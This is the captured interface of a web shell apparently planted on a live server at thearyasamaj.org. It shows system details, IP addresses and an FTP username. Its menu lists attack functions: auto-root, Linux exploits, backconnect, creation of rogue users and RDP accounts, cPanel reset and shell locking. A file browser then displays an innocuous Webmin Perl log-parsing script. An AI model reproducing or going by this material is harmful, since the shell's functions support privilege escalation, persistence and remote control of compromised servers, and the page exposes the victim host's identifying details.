Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
virtualmin-slavedns /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
newfeatures
[ DIR ]
drwxr-xr-x
CHANGELOG
137
B
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
cgi_args.pl
327
B
-rwxr-xr-x
defaultacl
6
B
-rw-r--r--
edit.cgi
2.08
KB
-rwxr-xr-x
install-type
4
B
-rw-r--r--
log_parser.pl
447
B
-rwxr-xr-x
modify-slavedns.pl
3.54
KB
-rwxr-xr-x
module.info
117
B
-rw-r--r--
module.info.nl
36
B
-rw-r--r--
save.cgi
2.67
KB
-rwxr-xr-x
virtual_feature.pl
14.96
KB
-rwxr-xr-x
virtualmin-slavedns-lib.pl
401
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : log_parser.pl
# log_parser.pl # Functions for parsing this module's logs use strict; use warnings; do 'virtualmin-slavedns-lib.pl'; # parse_webmin_log(user, script, action, type, object, ¶ms) # Converts logged information from this module into human-readable form sub parse_webmin_log { my ($user, $script, $action, $type, $object, $p) = @_; if ($action eq 'save') { return &text('log_save', "<tt>".&html_escape($object)."</tt>"); } return undef; } 1;
Close